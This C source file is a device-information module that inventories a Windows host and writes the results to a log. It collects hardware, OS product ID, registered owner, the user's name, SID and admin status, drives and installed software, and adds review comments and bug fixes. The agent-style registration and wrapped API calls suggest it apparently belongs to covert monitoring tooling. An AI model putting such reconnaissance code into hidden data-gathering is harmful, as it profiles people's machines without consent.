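/*
 * Device-information module: gathers a one-shot inventory of the local
 * Windows host and writes it to a log opened with Log_CreateFile(PM_DEVICEINFO).
 *
 * Data sources touched by this file (useful when reviewing what it reads):
 *   - HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0   (ProcessorNameString)
 *   - HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion     (ProductName, CSDVersion,
 *     ProductId, RegisteredOwner, RegisteredOrganization)
 *   - HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation (ActiveTimeBias)
 *   - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall  (both registry views)
 *   - GetSystemPowerStatus, GetSystemInfo, GlobalMemoryStatusEx, GetUserNameW,
 *     NetUserGetInfo (levels 1 and 23), ConvertSidToStringSidW, GetLocaleInfoW,
 *     GetDiskFreeSpaceExW, GetDriveTypeW, GetVolumeInformationW
 *
 * NOTE(review): the header name that followed the original "#include" was lost
 * when this listing was extracted; restore it from the original file.
 * NOTE(review): FNC(), date_delta, Log_*(), IsX64System(), PM_DEVICEINFO,
 * AM_MonitorRegister() and JSONObject are defined elsewhere in the project.
 */

/* Element count of a true array (not a pointer). */
#define DI_COUNTOF(a) (sizeof(a) / sizeof((a)[0]))

struct deviceinfo {
	struct {
		WCHAR delta[128];	// Date delta
	} timeinfo;

	struct {
		WCHAR proc[128];	// Processor description
		DWORD procnum;		// Number of processors
	} procinfo;

	struct {
		DWORD memtotal;		// Total physical memory (MB)
		DWORD memfree;		// Free physical memory (MB)
		DWORD memload;		// Memory load percentage
	} meminfo;

	struct {
		WCHAR ver[64];		// Windows version description
		WCHAR sp[64];		// Windows service pack description
		WCHAR id[64];		// Windows product ID
		WCHAR owner[64];	// Registered owner
		WCHAR org[64];		// Registered organization
	} osinfo;

	struct {
		WCHAR username[64];	// Name
		WCHAR fullname[64];	// Fullname
		WCHAR sid[64];		// SID
		DWORD priv;		// Privilege level (USER_PRIV_GUEST, USER_PRIV_USER, USER_PRIV_ADMIN)
	} userinfo;

	struct {
		DWORD timebias;		// Time bias from UTC (min)
		WCHAR lang[16];		// Language name
		WCHAR country[16];	// Country name
	} localinfo;

	struct {
		DWORD disktotal;	// Total disk space (MB)
		DWORD diskfree;		// Free disk space (MB)
	} diskinfo;

	struct {
		BOOL ac_connected;	// Connected to AC
		DWORD battery_level;	// % of battery
	} batteryinfo;
};

/*
 * Read a registry value into a fixed WCHAR buffer and guarantee termination.
 *
 * RegQueryValueExW does not promise that string data is NUL-terminated, so the
 * terminator is written explicitly (truncating the last character if the data
 * filled the whole buffer). On failure the buffer is set to the empty string.
 *
 * hKey: open key to query; name: value name; buf/cch: destination and its
 * capacity in WCHARs. Returns TRUE when the query succeeded.
 */
static BOOL DeviceInfo_ReadRegString(HKEY hKey, const WCHAR *name, WCHAR *buf, DWORD cch)
{
	DWORD len;
	DWORD chars;

	if (!buf || cch == 0)
		return FALSE;

	len = cch * sizeof(WCHAR);
	if (FNC(RegQueryValueExW)(hKey, name, NULL, NULL, (LPBYTE)buf, &len) != ERROR_SUCCESS) {
		buf[0] = L'\0';
		return FALSE;
	}

	chars = len / sizeof(WCHAR);
	if (chars >= cch)
		chars = cch - 1;
	buf[chars] = L'\0';
	return TRUE;
}

/*
 * Fill *di with time delta, power, CPU, memory, OS, user, locale and disk data.
 * Every field is written on every path, so the caller does not have to
 * pre-zero the structure. Fields whose source cannot be read are left empty
 * (strings) or zero (numbers).
 */
VOID GetDeviceInfo(struct deviceinfo *di)
{
	HKEY hKey = NULL;
	DWORD len;
	SYSTEM_INFO sysinfo;
	MEMORYSTATUSEX memstatus;
	LPUSER_INFO_1 userinfo1 = NULL;
	LPUSER_INFO_23 userinfo23 = NULL;
	WCHAR *sidstr = NULL;
	WCHAR homepath[MAX_PATH];
	ULARGE_INTEGER disktotal, diskfree;
	SYSTEM_POWER_STATUS sps;
	long long date_delta_l;
	BOOL negative_delta;
	DWORD seconds, minutes, hours, days;

	/***\
	 * Time
	\***/
	/* Combine the two halves through an unsigned intermediate: left-shifting
	 * a negative signed value is undefined behaviour. */
	date_delta_l = (long long)(((unsigned long long)date_delta.hi_delay << 32) + date_delta.lo_delay);
	if (date_delta_l < 0) {
		negative_delta = TRUE;
		date_delta_l = -date_delta_l;
	} else {
		negative_delta = FALSE;
	}

	date_delta_l /= 10000000;	// now in seconds
	seconds = (DWORD)(date_delta_l % 60);
	date_delta_l /= 60;		// now in minutes
	minutes = (DWORD)(date_delta_l % 60);
	date_delta_l /= 60;		// now in hours
	hours = (DWORD)(date_delta_l % 24);
	date_delta_l /= 24;		// now in days
	days = (DWORD)date_delta_l;

	if (days > 0)
		_snwprintf_s(di->timeinfo.delta, DI_COUNTOF(di->timeinfo.delta), _TRUNCATE,
			L"%s%dd %.2d:%.2d:%.2d", negative_delta ? L"-" : L"+", days, hours, minutes, seconds);
	else
		_snwprintf_s(di->timeinfo.delta, DI_COUNTOF(di->timeinfo.delta), _TRUNCATE,
			L"%s%.2d:%.2d:%.2d", negative_delta ? L"-" : L"+", hours, minutes, seconds);

	/***\
	 * Battery
	\***/
	di->batteryinfo.ac_connected = TRUE;
	di->batteryinfo.battery_level = 0;
	if (FNC(GetSystemPowerStatus)(&sps)) {
		if (sps.ACLineStatus == 0)
			di->batteryinfo.ac_connected = FALSE;
		/* 255 means the charge level is unknown; keep the 0 default then. */
		if (sps.BatteryLifePercent != 255)
			di->batteryinfo.battery_level = sps.BatteryLifePercent;
	}

	/***\
	 * Processor
	\***/
	di->procinfo.proc[0] = L'\0';
	if (FNC(RegOpenKeyExW)(HKEY_LOCAL_MACHINE, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", 0, KEY_READ, &hKey) == ERROR_SUCCESS)
		DeviceInfo_ReadRegString(hKey, L"ProcessorNameString", di->procinfo.proc, DI_COUNTOF(di->procinfo.proc));
	if (hKey) {
		FNC(RegCloseKey)(hKey);
		hKey = NULL;
	}

	FNC(GetSystemInfo)(&sysinfo);
	di->procinfo.procnum = sysinfo.dwNumberOfProcessors;

	/***\
	 * Memory
	\***/
	memstatus.dwLength = sizeof(memstatus);
	if (FNC(GlobalMemoryStatusEx)(&memstatus)) {
		di->meminfo.memtotal = (DWORD)(memstatus.ullTotalPhys / (1024 * 1024));
		di->meminfo.memfree = (DWORD)(memstatus.ullAvailPhys / (1024 * 1024));
		di->meminfo.memload = (DWORD)(memstatus.dwMemoryLoad);
	} else {
		/* memstatus is uninitialised when the call fails; do not report it. */
		di->meminfo.memtotal = 0;
		di->meminfo.memfree = 0;
		di->meminfo.memload = 0;
	}

	/***\
	 * OS
	\***/
	di->osinfo.ver[0] = L'\0';
	di->osinfo.sp[0] = L'\0';
	di->osinfo.id[0] = L'\0';
	di->osinfo.owner[0] = L'\0';
	di->osinfo.org[0] = L'\0';
	if (FNC(RegOpenKeyExW)(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, KEY_READ, &hKey) == ERROR_SUCCESS) {
		DeviceInfo_ReadRegString(hKey, L"ProductName", di->osinfo.ver, DI_COUNTOF(di->osinfo.ver));
		DeviceInfo_ReadRegString(hKey, L"CSDVersion", di->osinfo.sp, DI_COUNTOF(di->osinfo.sp));
		DeviceInfo_ReadRegString(hKey, L"ProductId", di->osinfo.id, DI_COUNTOF(di->osinfo.id));
		DeviceInfo_ReadRegString(hKey, L"RegisteredOwner", di->osinfo.owner, DI_COUNTOF(di->osinfo.owner));
		DeviceInfo_ReadRegString(hKey, L"RegisteredOrganization", di->osinfo.org, DI_COUNTOF(di->osinfo.org));
	}
	if (hKey) {
		FNC(RegCloseKey)(hKey);
		hKey = NULL;
	}

	/***\
	 * User
	\***/
	/* Set defaults first so the early exits below cannot leave stale data. */
	di->userinfo.fullname[0] = L'\0';
	di->userinfo.sid[0] = L'\0';
	di->userinfo.priv = 0;
	do {
		len = DI_COUNTOF(di->userinfo.username);	/* GetUserNameW takes a character count */
		if (!FNC(GetUserNameW)(di->userinfo.username, &len)) {
			di->userinfo.username[0] = L'\0';
			break;
		}

		/* NOTE(review): priv stays 0 when this lookup fails, and DumpDeviceInfo
		 * prints 0 as " {GUEST}"; a failed lookup is therefore indistinguishable
		 * from a real guest account in the output. */
		if (FNC(NetUserGetInfo)(NULL, di->userinfo.username, 1, (LPBYTE *)&userinfo1) == NERR_Success)
			di->userinfo.priv = userinfo1->usri1_priv;

		if (FNC(NetUserGetInfo)(NULL, di->userinfo.username, 23, (LPBYTE *)&userinfo23) != NERR_Success)
			break;

		/* wcsncpy_s rejects a NULL source, so guard the optional full name. */
		if (userinfo23->usri23_full_name)
			wcsncpy_s(di->userinfo.fullname, DI_COUNTOF(di->userinfo.fullname), userinfo23->usri23_full_name, _TRUNCATE);

		if (FNC(ConvertSidToStringSidW)(userinfo23->usri23_user_sid, &sidstr))
			wcsncpy_s(di->userinfo.sid, DI_COUNTOF(di->userinfo.sid), sidstr, _TRUNCATE);
	} while (0);

	if (sidstr)
		LocalFree(sidstr);
	if (userinfo1)
		FNC(NetApiBufferFree)(userinfo1);
	if (userinfo23)
		FNC(NetApiBufferFree)(userinfo23);

	/***\
	 * Local
	\***/
	if (!FNC(GetLocaleInfoW)(LOCALE_USER_DEFAULT, LOCALE_SISO639LANGNAME, di->localinfo.lang, DI_COUNTOF(di->localinfo.lang)))
		di->localinfo.lang[0] = L'\0';

	if (!FNC(GetLocaleInfoW)(LOCALE_USER_DEFAULT, LOCALE_SISO3166CTRYNAME, di->localinfo.country, DI_COUNTOF(di->localinfo.country)))
		di->localinfo.country[0] = L'\0';

	/* The destination is a single DWORD: pass its own size (the original passed
	 * the size of the processor-name buffer, allowing a larger value to spill
	 * into the adjacent fields) and reset timebias, not procinfo.proc, on failure. */
	di->localinfo.timebias = 0;
	if (FNC(RegOpenKeyExW)(HKEY_LOCAL_MACHINE, L"SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation", 0, KEY_READ, &hKey) == ERROR_SUCCESS) {
		len = sizeof(di->localinfo.timebias);
		if (FNC(RegQueryValueExW)(hKey, L"ActiveTimeBias", NULL, NULL, (LPBYTE)&di->localinfo.timebias, &len) != ERROR_SUCCESS)
			di->localinfo.timebias = 0;
	}
	if (hKey) {
		FNC(RegCloseKey)(hKey);
		hKey = NULL;
	}

	/***\
	 * Disk
	\***/
	/* GetEnvironmentVariableW takes a character count, not a byte count, and
	 * returns the required size (leaving the buffer unusable) when it is too
	 * small; fall back to C:\ in that case as well as when TMP is unset. */
	len = FNC(GetEnvironmentVariableW)(L"TMP", homepath, DI_COUNTOF(homepath));
	if (len == 0 || len >= DI_COUNTOF(homepath))
		wcsncpy_s(homepath, DI_COUNTOF(homepath), L"C:\\", _TRUNCATE);

	if (FNC(GetDiskFreeSpaceExW)(homepath, &diskfree, &disktotal, NULL)) {
		di->diskinfo.disktotal = (DWORD)(disktotal.QuadPart / (1024 * 1024));
		di->diskinfo.diskfree = (DWORD)(diskfree.QuadPart / (1024 * 1024));
	} else {
		di->diskinfo.disktotal = 0;
		di->diskinfo.diskfree = 0;
	}
}

#define DRIVE_HEADER_TEXT L"\n\nDrive List:\n"

/*
 * Append a "Drive List" section to the log: one line per drive letter A-Z
 * whose type is between DRIVE_REMOVABLE and DRIVE_RAMDISK, with the volume
 * label when one can be read.
 */
void GetDriveList(HANDLE hfile)
{
	WCHAR drive_letter[4];
	WCHAR drive_name[256];
	/* Indexed by (type - DRIVE_REMOVABLE); the range check below keeps it in bounds. */
	WCHAR type_name[5][20] = {L"removable", L"disk", L"network", L"cd-rom", L"ram disk"};
	WCHAR device_info_string[512];
	DWORD type;

	drive_letter[1] = L':';
	drive_letter[2] = L'\\';
	drive_letter[3] = 0;

	Log_WriteFile(hfile, (BYTE *)DRIVE_HEADER_TEXT, wcslen(DRIVE_HEADER_TEXT) * sizeof(WCHAR));

	for (drive_letter[0] = L'A'; drive_letter[0] <= L'Z'; drive_letter[0]++) {
		type = FNC(GetDriveTypeW)(drive_letter);
		if (type < DRIVE_REMOVABLE || type > DRIVE_RAMDISK)
			continue;

		/* Zeroed first so a failed label lookup reads as "no label". */
		ZeroMemory(drive_name, sizeof(drive_name));
		FNC(GetVolumeInformationW)(drive_letter, drive_name, 255, NULL, NULL, NULL, NULL, 0);

		if (wcslen(drive_name))
			_snwprintf_s(device_info_string, DI_COUNTOF(device_info_string), _TRUNCATE,
				L"%s \"%s\" (%s)\n", drive_letter, drive_name, type_name[type - DRIVE_REMOVABLE]);
		else
			_snwprintf_s(device_info_string, DI_COUNTOF(device_info_string), _TRUNCATE,
				L"%s (%s)\n", drive_letter, type_name[type - DRIVE_REMOVABLE]);

		Log_WriteFile(hfile, (BYTE *)device_info_string, wcslen(device_info_string) * sizeof(WCHAR));
	}
}

#define APPLICATION_HEADER_TEXT L"\n\nApplication List:\n"

/*
 * Append an "Application List" section to the log from the Uninstall key.
 *
 * bX64View: when TRUE the key is opened with KEY_WOW64_64KEY.
 * Entries that carry a ParentKeyName value, have SystemComponent == 1, or
 * have no DisplayName are skipped. DisplayVersion is appended in parentheses
 * when present.
 */
VOID GetApplicationInfo(HANDLE hfile, BOOL bX64View)
{
	HKEY hKeyUninstall = NULL, hKeyProgram = NULL;
	DWORD dwordval, index, len;
	LONG status;
	WCHAR keyname[256];	/* registry key names are at most 255 characters */
	WCHAR stringval[128], product[256];
	ULONG uSamDesidered = KEY_READ;

	if (bX64View)
		uSamDesidered |= KEY_WOW64_64KEY;

	do {
		index = 0;

		if (FNC(RegOpenKeyExW)(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, uSamDesidered, &hKeyUninstall) != ERROR_SUCCESS)
			break;

		Log_WriteFile(hfile, (BYTE *)APPLICATION_HEADER_TEXT, wcslen(APPLICATION_HEADER_TEXT) * sizeof(WCHAR));

		while (1) {
			/* Close the subkey left open by the previous iteration. */
			if (hKeyProgram) {
				FNC(RegCloseKey)(hKeyProgram);
				hKeyProgram = NULL;
			}

			len = DI_COUNTOF(keyname);
			status = FNC(RegEnumKeyExW)(hKeyUninstall, index++, keyname, &len, NULL, NULL, NULL, NULL);
			/* An over-long name only disqualifies that one entry; any other
			 * error (including "no more items") ends the enumeration. */
			if (status == ERROR_MORE_DATA)
				continue;
			if (status != ERROR_SUCCESS)
				break;

			if (FNC(RegOpenKeyExW)(hKeyUninstall, keyname, 0, KEY_READ, &hKeyProgram) != ERROR_SUCCESS)
				continue;

			/* Presence of ParentKeyName is enough to skip the entry. */
			if (!FNC(RegQueryValueExW)(hKeyProgram, L"ParentKeyName", NULL, NULL, NULL, NULL))
				continue;

			len = sizeof(dwordval);
			if (!FNC(RegQueryValueExW)(hKeyProgram, L"SystemComponent", NULL, NULL, (LPBYTE)&dwordval, &len) && (dwordval == 1))
				continue;

			if (!DeviceInfo_ReadRegString(hKeyProgram, L"DisplayName", stringval, DI_COUNTOF(stringval)))
				continue;

			wcsncpy_s(product, DI_COUNTOF(product), stringval, _TRUNCATE);

			if (DeviceInfo_ReadRegString(hKeyProgram, L"DisplayVersion", stringval, DI_COUNTOF(stringval))) {
				wcsncat_s(product, DI_COUNTOF(product), L" (", _TRUNCATE);
				wcsncat_s(product, DI_COUNTOF(product), stringval, _TRUNCATE);
				wcsncat_s(product, DI_COUNTOF(product), L")", _TRUNCATE);
			}

			wcsncat_s(product, DI_COUNTOF(product), L"\n", _TRUNCATE);

			Log_WriteFile(hfile, (BYTE *)product, wcslen(product) * sizeof(WCHAR));
		}
	} while (0);

	if (hKeyUninstall) {
		FNC(RegCloseKey)(hKeyUninstall);
		hKeyUninstall = NULL;
	}
}

/*
 * Collect the device information, format it as one text report and write it,
 * followed by the drive list and both application lists, to a PM_DEVICEINFO log.
 */
void DumpDeviceInfo()
{
	HANDLE hfile;
	WCHAR null_wchar = 0;
	struct deviceinfo di;
	/* Sized from the structure so every string field fits alongside the labels. */
	WCHAR device_info_string[(sizeof(di) / sizeof(WCHAR)) + 512];

	memset(&di, 0, sizeof(di));
	GetDeviceInfo(&di);

	_snwprintf_s(device_info_string, DI_COUNTOF(device_info_string), _TRUNCATE,
		L"Processor: %d x %s\n"
		L"Memory: %dMB free / %dMB total (%u%% used)\n"
		L"Disk: %dMB free / %dMB total\n"
		L"Battery: %s%d%%\n"
		L"\n"
		L"OS Version: %s%s%s%s%s\n"
		L"Registered to: %s%s%s%s {%s}\n"
		L"Locale settings: %s_%s (UTC %+.2d:%.2d)\n"
		L"Time delta: %s\n"
		L"\n"
		L"User: %s%s%s%s%s\n"
		L"SID: %s",
		di.procinfo.procnum, di.procinfo.proc,
		di.meminfo.memfree, di.meminfo.memtotal, di.meminfo.memload,
		di.diskinfo.diskfree, di.diskinfo.disktotal,
		(di.batteryinfo.ac_connected) ? L"AC Connected - " : L"", di.batteryinfo.battery_level,
		di.osinfo.ver,
		(di.osinfo.sp[0]) ? L" (" : L"", (di.osinfo.sp[0]) ? di.osinfo.sp : L"", (di.osinfo.sp[0]) ? L")" : L"",
		IsX64System() ? L" (64bit)" : L" (32bit)",
		di.osinfo.owner,
		(di.osinfo.org[0]) ? L" (" : L"", (di.osinfo.org[0]) ? di.osinfo.org : L"", (di.osinfo.org[0]) ? L")" : L"",
		di.osinfo.id,
		di.localinfo.lang, di.localinfo.country,
		/* The bias is minutes to add to local time to reach UTC, hence the sign flip. */
		(-1 * (int)di.localinfo.timebias) / 60, abs((int)di.localinfo.timebias) % 60,
		di.timeinfo.delta,
		di.userinfo.username,
		(di.userinfo.fullname[0]) ? L" (" : L"", (di.userinfo.fullname[0]) ? di.userinfo.fullname : L"", (di.userinfo.fullname[0]) ? L")" : L"",
		/* priv 0 -> guest, 1 -> ordinary user (no tag), anything else -> admin */
		(di.userinfo.priv) ? ((di.userinfo.priv == 1) ? L"" : L" {ADMIN}") : L" {GUEST}",
		di.userinfo.sid);

	/* NOTE(review): the handle is used without a failure check; whether
	 * Log_WriteFile tolerates a failed Log_CreateFile is not visible here. */
	hfile = Log_CreateFile(PM_DEVICEINFO, NULL, 0);
	Log_WriteFile(hfile, (BYTE *)device_info_string, wcslen(device_info_string) * sizeof(WCHAR));

	// Enumerate the drives that are present
	GetDriveList(hfile);

	GetApplicationInfo(hfile, FALSE);
	GetApplicationInfo(hfile, TRUE);

	// NUL-terminate the whole logged string
	Log_WriteFile(hfile, (BYTE *)&null_wchar, sizeof(WCHAR));
	Log_CloseFile(hfile);
}

/*
 * Start/stop callback. Returns 1 in every case.
 */
DWORD __stdcall PM_DeviceInfoStartStop(BOOL bStartFlag, BOOL bReset)
{
	// This agent has no started/stopped state; when it is started
	// it performs a single immediate action.
	if (bStartFlag && bReset)
		DumpDeviceInfo();

	return 1;
}

/*
 * Configuration callback. The element is ignored; always returns 1.
 */
DWORD __stdcall PM_DeviceInfoInit(JSONObject elem)
{
	return 1;
}

/*
 * Register this module's callbacks under the name L"device" / PM_DEVICEINFO.
 */
void PM_DeviceInfoRegister()
{
	AM_MonitorRegister(L"device", PM_DEVICEINFO, NULL, (BYTE *)PM_DeviceInfoStartStop, (BYTE *)PM_DeviceInfoInit, NULL);
}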